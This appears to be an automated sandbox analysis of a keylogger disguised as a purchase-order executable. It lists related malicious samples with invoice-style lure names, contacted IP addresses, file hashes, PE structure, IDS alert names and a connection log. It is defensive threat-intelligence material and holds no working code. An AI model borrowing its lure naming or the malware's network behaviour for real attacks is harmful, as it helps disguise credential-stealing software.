                                                            Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 119.18.54.39
                                                            z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 208.91.198.143
                                                            z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 208.91.199.223
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            54328bd36c14bd82ddaa0c04b25ed9adinvoice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            http://azgop.org/Get hashmaliciousUnknownBrowse
                                                            • 188.114.96.3
                                                            SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            SWIFT_COPY_-024-172700818106527.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            3140, EUR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            uvDYInLodR.exeGet hashmaliciousNjratBrowse
                                                            • 188.114.96.3
                                                            3b5074b1b5d032e5620f69f9f700ff0einvoice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            file.exeGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Printable_Copy.jsGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            Printable_Copy.jsGet hashmaliciousUnknownBrowse
                                                            • 149.154.167.220
                                                            OuaJzAFCTk.exeGet hashmaliciousDCRatBrowse
                                                            • 149.154.167.220
                                                            No context
                                                            Process:C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1172
                                                            Entropy (8bit):5.354777075714867
                                                            Encrypted:false
                                                            SSDEEP:24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                            MD5:92C17FC0DE8449D1E50ED56DBEBAA35D
                                                            SHA1:A617D392757DC7B1BEF28448B72CBD131CF4D0FB
                                                            SHA-256:DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
                                                            SHA-512:603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.734724374828538
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:Purchase Order 007823-PO# 005307.exe
                                                            File size:763'392 bytes
                                                            MD5:89b1330440f5e3cc7fdf662981760845
                                                            SHA1:39484bf19c50d51022b3f90361bfd048b1ee1df6
                                                            SHA256:2095af004e76f0cf7243b68e868eeb3b9c8c157d632aa785a87a93addf3b75fc
                                                            SHA512:2db2b4de6eb9bda9b1d93d4e14417a31193cdcebd4736b07a49d0d72e34244d166285107eda6968c3b781e20e7302a2d93b2e5a3df93a6b3217e6a3d426bc1e3
                                                            SSDEEP:12288:a4Gc47cJDImS//BEQPo+wknW47+O7dwKOFxFp/xb0rA5CXpLJ+U3T:9GrSImS//BEknwGW47+OZFOFH0rA5yJ+
                                                            TLSH:CCF4E0D53B35731ADEB85A749529DEF452B51E28B000BAE32EDD3B87359D211AE0CF02
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................@................................
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x4bb9ee
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xBFC6CF92 [Wed Dec 16 07:45:22 2071 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbb9990x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x63c.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xba28c0x70.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xb99f40xb9a00ca32d2fdc6038ef3d1ca693121a16ef3False0.8930345117845118data7.742206818544972IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xbc0000x63c0x80043903e596f473868e3b6caff945432e1False0.33935546875data3.494903261920162IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xbe0000xc0x2000022309dfd05518c71c34221c1dfffd7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0xbc0900x3acdata0.4148936170212766
                                                            RT_MANIFEST0xbc44c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                            DLLImport
                                                            mscoree.dll_CorExeMain
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-10-01T07:21:00.644750+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949708132.226.247.7380TCP
                                                            2024-10-01T07:21:01.644807+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949708132.226.247.7380TCP
                                                            2024-10-01T07:21:02.213042+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949711188.114.96.3443TCP
                                                            2024-10-01T07:21:02.972884+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949713132.226.247.7380TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 1, 2024 07:20:59.690455914 CEST4970880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:20:59.695432901 CEST8049708132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:20:59.695530891 CEST4970880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:20:59.695822954 CEST4970880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:20:59.700602055 CEST8049708132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:00.378700972 CEST8049708132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:00.386464119 CEST4970880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:00.391307116 CEST8049708132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:00.594599962 CEST8049708132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:00.644750118 CEST4970880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:00.693332911 CEST49710443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:00.693372011 CEST44349710188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:00.693533897 CEST49710443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:00.716344118 CEST49710443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:00.716366053 CEST44349710188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:01.185246944 CEST44349710188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:01.185621977 CEST49710443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:01.192096949 CEST49710443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:01.192115068 CEST44349710188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:01.192436934 CEST44349710188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:01.238573074 CEST49710443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:01.253024101 CEST49710443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:01.299403906 CEST44349710188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:01.368659973 CEST44349710188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:01.368761063 CEST44349710188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:01.368880987 CEST49710443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:01.379735947 CEST49710443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:01.384105921 CEST4970880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:01.388998032 CEST8049708132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:01.592236996 CEST8049708132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:01.597532988 CEST49711443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:01.597582102 CEST44349711188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:01.597656012 CEST49711443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:01.602149963 CEST49711443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:01.602174997 CEST44349711188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:01.644807100 CEST4970880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:02.068370104 CEST44349711188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:02.071516991 CEST49711443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:02.071532965 CEST44349711188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:02.213049889 CEST44349711188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:02.213149071 CEST44349711188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:02.213211060 CEST49711443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:02.213927031 CEST49711443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:02.218230963 CEST4970880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:02.219484091 CEST4971380192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:02.223349094 CEST8049708132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:02.223417997 CEST4970880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:02.224293947 CEST8049713132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:02.224617958 CEST4971380192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:02.224773884 CEST4971380192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:02.229512930 CEST8049713132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:02.921678066 CEST8049713132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:02.923315048 CEST49714443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:02.923368931 CEST44349714188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:02.923430920 CEST49714443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:02.923803091 CEST49714443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:02.923823118 CEST44349714188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:02.972883940 CEST4971380192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:03.386611938 CEST44349714188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:03.388695955 CEST49714443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:03.388720989 CEST44349714188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:03.533166885 CEST44349714188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:03.533287048 CEST44349714188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:03.533343077 CEST49714443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:03.534075022 CEST49714443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:03.540332079 CEST4971680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:03.545161963 CEST8049716132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:03.545336008 CEST4971680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:03.545608044 CEST4971680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:03.550478935 CEST8049716132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:05.218928099 CEST8049716132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:05.219253063 CEST8049716132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:05.219382048 CEST4971680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:05.219564915 CEST8049716132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:05.219621897 CEST4971680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:05.219705105 CEST8049716132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:05.219806910 CEST4971680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:05.220937014 CEST49717443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:05.221003056 CEST44349717188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:05.221105099 CEST49717443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:05.221398115 CEST49717443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:05.221412897 CEST44349717188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:05.678859949 CEST44349717188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:05.681210041 CEST49717443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:05.681245089 CEST44349717188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:05.803971052 CEST44349717188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:05.804074049 CEST44349717188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:05.804152966 CEST49717443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:05.804780006 CEST49717443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:05.808486938 CEST4971680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:05.809761047 CEST4971880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:05.813604116 CEST8049716132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:05.813697100 CEST4971680192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:05.814551115 CEST8049718132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:05.814680099 CEST4971880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:05.814796925 CEST4971880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:05.819521904 CEST8049718132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:06.500246048 CEST8049718132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:06.501683950 CEST49719443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:06.501733065 CEST44349719188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:06.501804113 CEST49719443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:06.502053022 CEST49719443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:06.502067089 CEST44349719188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:06.551095009 CEST4971880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:07.034605026 CEST44349719188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:07.036740065 CEST49719443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:07.036776066 CEST44349719188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:07.179667950 CEST44349719188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:07.179776907 CEST44349719188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:07.179837942 CEST49719443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:07.180397987 CEST49719443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:07.184329987 CEST4971880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:07.185444117 CEST4972080192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:07.190486908 CEST8049718132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:07.190601110 CEST4971880192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:07.191193104 CEST8049720132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:07.191257000 CEST4972080192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:07.191354990 CEST4972080192.168.2.9132.226.247.73
                                                            Oct 1, 2024 07:21:07.196125984 CEST8049720132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:07.883394003 CEST8049720132.226.247.73192.168.2.9
                                                            Oct 1, 2024 07:21:07.885176897 CEST49721443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:07.885220051 CEST44349721188.114.96.3192.168.2.9
                                                            Oct 1, 2024 07:21:07.885332108 CEST49721443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:07.885620117 CEST49721443192.168.2.9188.114.96.3
                                                            Oct 1, 2024 07:21:07.885633945 CEST44349721188.114.96.3192.168.2.9
